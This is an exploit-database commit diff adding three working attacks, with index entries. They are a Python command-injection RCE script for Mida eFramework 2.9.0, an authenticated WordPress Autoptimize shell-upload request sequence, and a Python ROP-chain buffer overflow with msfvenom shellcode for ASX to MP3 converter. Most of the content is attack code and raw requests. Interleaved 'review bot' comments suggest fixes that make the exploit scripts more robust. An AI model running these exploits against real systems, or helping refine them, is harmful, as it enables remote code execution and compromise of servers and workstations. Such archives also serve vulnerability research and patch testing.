DB: 2020-08-28
3 changes to exploits/shellcodes ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC) Mida eFramework 2.9.0 - Remote Code Execution Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
This commit is contained in:
parent
8bf2002f51
commit
2621b3c52e
4 changed files with 292 additions and 0 deletions
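--- a/exploits/multiple/webapps/48768.py
+++ b/exploits/multiple/webapps/48768.py
@@ -0,0 +1,72 @@
+# Exploit Title: Mida eFramework 2.9.0 - Remote Code Execution
+# Google Dork: Server: Mida eFramework
+# Date: 2020-08-27
+# Exploit Author: elbae
+# Vendor Homepage: https://www.midasolutions.com/
+# Software Link: http://ova-efw.midasolutions.com/
+# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+# Version: <= 2.9.0
+# CVE : CVE-2020-15920
+
+
+#! /usr/bin/python3
+# -*- coding: utf-8 -*-
+
+import argparse
+import requests
+import subprocess
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
+def print_disclaimer():
+    print("""
+---------------------
+Disclaimer:
+1) For testing purpose only.
+2) Do not attack production environments.
+3) Intended for educational purposes only and cannot be used for law
+violation or personal gain.
+4) The author is not responsible for any possible harm caused by this
+material.
+---------------------""")
+
+
+def print_info():
+    print("""
+[*] PoC exploit for Mida eFramework <= 2.9.0 PDC (CVE-2020-15920)
+[*] Reference:
+https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
+[*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability
+(RCE) in PDC/ajaxreq.php
+Version\t< 2.9.0\t./CVE-2020-15920
+http://192.168.1.60:8090/PDC/ajaxreq.php id
+Version\t2.9.0\t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php
+id """)
+
+def pwn(url,cmd):
+    running = """
+[*] Target URL: {0}
+[*] Command: {1}
+"""
+    print(running.format(url,cmd))
+    data = {
+        "DIAGNOSIS":"PING",
+        "PARAM":"127.0.0.1 -c 0; {0}".format(cmd)
+    }
+    r = requests.post(url,data=data,verify=False)
+    line = "[*]"+"-"*20+" Output " + "-" *20 +"[*]"
+    pretty_output = r.text.replace('<br>','\n')
+    print(line+"\n{0}\n".format(pretty_output)+line)
+
+def main():
+    print_info()
+    print_disclaimer()
+    parser = argparse.ArgumentParser()
+    parser.add_argument("target", type=str, help="the complete target URL")
+    parser.add_argument("cmd", type=str, help="the command you want to run")
+    args = parser.parse_args()
+    pwn(args.target, args.cmd)
+
+if __name__ == '__main__':
+    main()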
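Review bot: The `requests.post(url,data=data,verify=False)` call in pwn() has no `timeout`, so the script blocks indefinitely when the host does not answer, and `verify=False` together with the urllib3 warning suppression at module level means TLS certificates are never validated without the user being told. Pass an explicit timeout, `r = requests.post(url, data=data, verify=False, timeout=10)`, and note the unverified-TLS choice in the print_info() banner or a comment above the call. `import subprocess` is unused and can be dropped. The shebang on line 12 is not on the first line of the file, so it has no effect when the script is invoked directly.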
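--- a/exploits/php/webapps/48770.txt
+++ b/exploits/php/webapps/48770.txt
@@ -0,0 +1,84 @@
+# Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)
+# Date: 2020-08-24
+# Software Link: https://wordpress.org/plugins/autoptimize/
+# Author : SunCSR Team
+# Version: v2.7.6
+# Tested on Ubuntu 18.04 / Kali Linux
+# Reference: https://wpvulndb.com/vulnerabilities/10372
+
+Description :
+-------------------------------------------------------------------
+
+The ao_ccss_import AJAX call does not ensure that the file provided is a
+legitimate Zip file, allowing high privilege users to upload arbitrary
+files, such as PHP, leading to RCE.
+
+[POC]
+
+Step 1 :
+POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
+Host: pwnme
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
+Firefox/80.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://pwnme.me/wordpress/wp-admin/options-general.php?page=ao_critcss
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------26086940735210916964189813544
+Content-Length: 685
+Origin: http://pwnme
+Connection: close
+Cookie: autoptimize_feed=1;
+wordpress_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7Cc2f54fb4e357d2c591b7e5f53e6adb9531b0de5cc5fbc3cab3185f63917307cd;
+wordpress_test_cookie=WP+Cookie+check;
+wordpress_logged_in_01c9c451f599e513a69d1e6bb6f8e273=admin%7C1598689405%7CiAGVovdBGV28Gk5pKstmbpGqYZA7Zbxq7lUoUBL0y6B%7C409cbfa6f750ff5902273e879e79d9f746c038c35228c978ea9cc3525eb12602;
+wp-settings-time-1=1598516614
+
+
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="file"; filename="shell.php"
+Content-Type: application/zip
+
+<?php Shell Content Here ! ?>
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="action"
+
+ao_ccss_import
+-----------------------------404272946439029073744006559647
+Content-Disposition: form-data; name="ao_ccss_import_nonce"
+
+f25ca64f22
+-----------------------------404272946439029073744006559647--
+
+
+[Response]
+
+HTTP/1.1 200 OK
+Server: nginx/1.14.0 (Ubuntu)
+Date: Thu, 27 Aug 2020 08:21:08 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: close
+Access-Control-Allow-Origin: http://pwnme.me
+Access-Control-Allow-Credentials: true
+X-Robots-Tag: noindex
+X-Content-Type-Options: nosniff
+Expires: Wed, 11 Jan 1984 05:00:00 GMT
+Cache-Control: no-cache, must-revalidate, max-age=0
+X-Frame-Options: SAMEORIGIN
+Referrer-Policy: strict-origin-when-cross-origin
+Content-Length: 53
+
+{"code":"200","msg":"Settings imported successfully"}
+
+
+Step 2: Access to
+http://victim//wordpress/wp-content/uploads/ao_ccss/shell.php
+
+
+Recommendations: Update to version 2.7.7
+
+
+Thank you very much!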
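--- a/exploits/windows/local/48769.py
+++ b/exploits/windows/local/48769.py
@@ -0,0 +1,133 @@
+# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
+# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-08-25
+# Vulnerable Software: ASX to MP3 converter
+# Version: 3.1.3.7.2010.11.05
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)
+
+# Proof of Concept :
+
+# 1.- Run python code: asx_to_mp3_rop_exploit.py
+# 2.- Works on DEP enabled for ASX2MP3Converter.exe
+# 3.- Open "ASX2MP3Converter.exe"
+# 4.- Click on "Load" Button
+# 5.- Select generated file "asx_to_mp3_rop_exploit.wax".
+# 6.- Click on "Open".
+# 7.- Calc.exe runs.
+
+
+#################################################################################################################################################
+
+#Python "asx_to_mp3_rop_exploit.py" Code:
+
+import struct
+file = 'asx_to_mp3_rop_exploit.wax'
+
+
+payload = "http://"
+payload += "A" * 17417 + struct.pack('<L', 0x10010C8A) + "CCCC"
+
+
+## msfvenom -a x86 -p windows/exec cmd=calc -b "\x00\x0a\x09" -f python
+
+buf = ""
+buf += "\xbe\x4b\xe7\x94\x8c\xdb\xcd\xd9\x74\x24\xf4\x5a\x33"
+buf += "\xc9\xb1\x30\x31\x72\x13\x03\x72\x13\x83\xea\xb7\x05"
+buf += "\x61\x70\xaf\x48\x8a\x89\x2f\x2d\x02\x6c\x1e\x6d\x70"
+buf += "\xe4\x30\x5d\xf2\xa8\xbc\x16\x56\x59\x37\x5a\x7f\x6e"
+buf += "\xf0\xd1\x59\x41\x01\x49\x99\xc0\x81\x90\xce\x22\xb8"
+buf += "\x5a\x03\x22\xfd\x87\xee\x76\x56\xc3\x5d\x67\xd3\x99"
+buf += "\x5d\x0c\xaf\x0c\xe6\xf1\x67\x2e\xc7\xa7\xfc\x69\xc7"
+buf += "\x46\xd1\x01\x4e\x51\x36\x2f\x18\xea\x8c\xdb\x9b\x3a"
+buf += "\xdd\x24\x37\x03\xd2\xd6\x49\x43\xd4\x08\x3c\xbd\x27"
+buf += "\xb4\x47\x7a\x5a\x62\xcd\x99\xfc\xe1\x75\x46\xfd\x26"
+buf += "\xe3\x0d\xf1\x83\x67\x49\x15\x15\xab\xe1\x21\x9e\x4a"
+buf += "\x26\xa0\xe4\x68\xe2\xe9\xbf\x11\xb3\x57\x11\x2d\xa3"
+buf += "\x38\xce\x8b\xaf\xd4\x1b\xa6\xed\xb2\xda\x34\x88\xf0"
+buf += "\xdd\x46\x93\xa4\xb5\x77\x18\x2b\xc1\x87\xcb\x08\x3d"
+buf += "\xc2\x56\x38\xd6\x8b\x02\x79\xbb\x2b\xf9\xbd\xc2\xaf"
+buf += "\x08\x3d\x31\xaf\x78\x38\x7d\x77\x90\x30\xee\x12\x96"
+buf += "\xe7\x0f\x37\xf5\x66\x9c\xdb\xfa"
+
+
+
+## Save allocation type (0x1000) in EDX
+payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
+payload += struct.pack('<L', 0x11112112)
+payload += struct.pack('<L', 0x10029B8C) # XOR EDX,EDX # RETN
+payload += struct.pack('<L', 0x1002D493) # POP EDX # RETN
+payload += struct.pack('<L', 0xEEEEEEEE)
+payload += struct.pack('<L', 0x10047F4D) # ADC EDX,ESI # POP ESI # RETN
+payload += struct.pack('<L', 0x41414141)
+
+
+## Save the address of VirtualAlloc() in ESI
+payload += struct.pack('<L', 0x1002fade) # POP EAX # RETN
+payload += struct.pack('<L', 0x1004f060) # ptr to &VirtualAlloc()
+payload += struct.pack('<L', 0x1003239f) # MOV EAX,DWORD PTR DS:[EAX] # RETN
+payload += struct.pack('<L', 0x10040754) # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
+payload += struct.pack('<L', 0x41414141)
+payload += struct.pack('<L', 0x41414141)
+
+
+## Save the size of the block in EBX
+payload += struct.pack('<L', 0x1004d881) # XOR EAX,EAX # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x1003b34d) # ADD EAX,29 # RETN
+payload += struct.pack('<L', 0x10034735) # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
+
+
+
+## Save the address of esp in EBP
+payload += struct.pack('<L', 0x10031c6c) # POP EBP # RETN
+payload += struct.pack('<L', 0x10012316) # ADD ESP,8 # RETN
+
+
+
+##Save memory protection code (0x40) in ECX
+payload += struct.pack('<L',0x1002e16c) # POP ECX # RETN
+payload += struct.pack('<L',0xffffffff)
+payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN
+payload += struct.pack('<L',0x10031ebe) # INC ECX # AND EAX,8 # RETN
+payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
+payload += struct.pack('<L',0x1002a5b7) # ADD ECX,ECX # RETN
+
+
+## Save ROP-NOP in EDI
+payload += struct.pack('<L', 0x1002e346) # POP EDI # RETN
+payload += struct.pack('<L', 0x10010C8A) # RETN
+
+
+
+
+## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
+payload += struct.pack('<L', 0x1002E516) # POP EAX # RETN
+payload += struct.pack('<L', 0xA4E2F275)
+payload += struct.pack('<L', 0x1003efe2) # ADD EAX,5B5D5E5F # RETN
+payload += struct.pack('<L', 0x10040ce5) # PUSH EAX # RETN
+
+
+
+payload += "\x90" * 4
+payload += struct.pack('<L', 0x1003df73) # & PUSH ESP # RETN
+payload += "\x90" * 20
+payload += buf
+
+
+
+f = open(file,'w')
+f.write(payload)
+f.close()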
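Review bot: The script only runs under Python 2, but nothing in the header says so: on Python 3 `struct.pack` returns bytes, so `"A" * 17417 + struct.pack('<L', 0x10010C8A)` raises TypeError at the second assignment to `payload`, and the text-mode `open(file,'w')` at the end would apply platform newline translation to the written data. Add an interpreter note next to the usage steps, e.g. `# Requires Python 2.x: str/bytes concatenation and text-mode write`. The write itself is better expressed as `with open(file, 'wb') as f:` / `f.write(payload)` so the handle is closed even if the write fails; `file` also shadows the Python 2 builtin of that name, so a name such as `out_path` reads more clearly.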
@ -11139,6 +11139,7 @@ id,file,description,date,author,type,platform,port
48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43006,3 +43007,5 @@ id,file,description,date,author,type,platform,port
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,
48765,exploits/multiple/webapps/48765.txt,"Ericom Access Server x64 9.2.0 - Server-Side Request Forgery",2020-08-26,hyp3rlinx,webapps,multiple,
48766,exploits/multiple/webapps/48766.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal",2020-08-26,LiquidWorm,webapps,multiple,
48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,
48770,exploits/php/webapps/48770.txt,"Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)",2020-08-27,"SunCSR Team",webapps,php,